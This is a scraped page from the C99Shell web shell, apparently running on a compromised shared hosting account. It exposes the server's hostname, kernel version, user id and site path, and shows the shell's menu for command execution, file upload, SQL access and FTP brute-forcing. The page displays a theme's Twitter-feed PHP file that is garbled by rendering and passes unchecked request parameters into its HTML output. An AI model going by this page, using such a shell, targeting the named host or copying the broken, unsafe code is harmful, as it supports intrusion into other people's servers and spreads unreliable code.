!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache. PHP/5.6.40 

uname -a: Linux cpanel06wh.bkk1.cloud.z.com 2.6.32-954.3.5.lve1.4.80.el6.x86_64 #1 SMP Thu Sep 24
01:42:00 EDT 2020 x86_64
 

uid=851(cp949260) gid=853(cp949260) groups=853(cp949260) 

Safe-mode: OFF (not secure)

/home/cp949260/public_html/phbcoop.com/php/   drwxr-xr-x
Free 236.36 GB of 981.82 GB (24.07%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     twitter-feed.php (2.69 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/*
Name:             Twitter Feed
Written by:     Okler Themes - (http://www.okler.net)
Theme Version:    7.5.0
*/

require_once('tweet-php/TweetPHP.php');

// Step 1 - To interact with Twitter’s API you will need to create an API KEY, which you can create at: https://dev.twitter.com/apps

// Step 2 - After creating your API Key you will need to take note of following values: "Consumer key", "Consumer secret", "Access token", "Access token secret" and replace the vars below:

$consumer_key "1111111111111111111111";
$consumer_secret "11111111111111111111111111111111111111111";
$access_token "1111111111-111111111111111111111111111111111111111";
$access_secret "111111111111111111111111111111111111111111111";

$twitter_screen_name $_GET['twitter_screen_name'];
$tweets_to_display = (isset( $_GET['tweets_to_display'] ) AND $_GET['tweets_to_display'] != '') ? $_GET['tweets_to_display'] : 2;
$icon_color $_GET['icon_color'];

$TweetPHP = new TweetPHP(array(
    
'consumer_key'          => $consumer_key,
    
'consumer_secret'       => $consumer_secret,
    
'access_token'          => $access_token,
    
'access_token_secret'   => $access_secret,
    
'twitter_screen_name'   => $twitter_screen_name,
    
'cache_file'            => dirname(__FILE__) . '/tweet-php/cache/twitter.txt'// Where on the server to save the cached formatted tweets
    
'cache_file_raw'        => dirname(__FILE__) . '/tweet-php/cache/twitter-array.txt'// Where on the server to save the cached raw tweets
    
'cachetime'             => 60// Seconds to cache feed
    
'tweets_to_display'     => $tweets_to_display// How many tweets to fetch
    
'ignore_replies'        => true// Ignore @replies
    
'ignore_retweets'       => true// Ignore retweets
    
'twitter_style_dates'   => true// Use twitter style dates e.g. 2 hours ago
    
'twitter_date_text'     => array('seconds''minutes''about''hour''ago'),
    
'date_format'           => '%I:%M %p %b %d%O'// The defult date format e.g. 12:08 PM Jun 12th. See: http://php.net/manual/en/function.strftime.php
    
'date_lang'             => null// Language for date e.g. 'fr_FR'. See: http://php.net/manual/en/function.setlocale.php
    
'format'                => 'html'// Can be 'html' or 'array'
    
'twitter_wrap_open'     => '<ul>',
    
'twitter_wrap_close'    => '</ul>',
    
'tweet_wrap_open'       => '<li><span class="status"><i class="fab fa-twitter'. (( $icon_color ) ? ' '$icon_color '') .'"></i> ',
    
'meta_wrap_open'        => '</span><span class="meta"> ',
    
'meta_wrap_close'       => '</span>',
    
'tweet_wrap_close'      => '</li>',
    
'error_message'         => 'Oops, our twitter feed is unavailable right now.',
    
'error_link_text'       => 'Follow us on Twitter',
    
'debug'                 => false
));

echo 
$TweetPHP->get_tweet_list();
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.052 ]--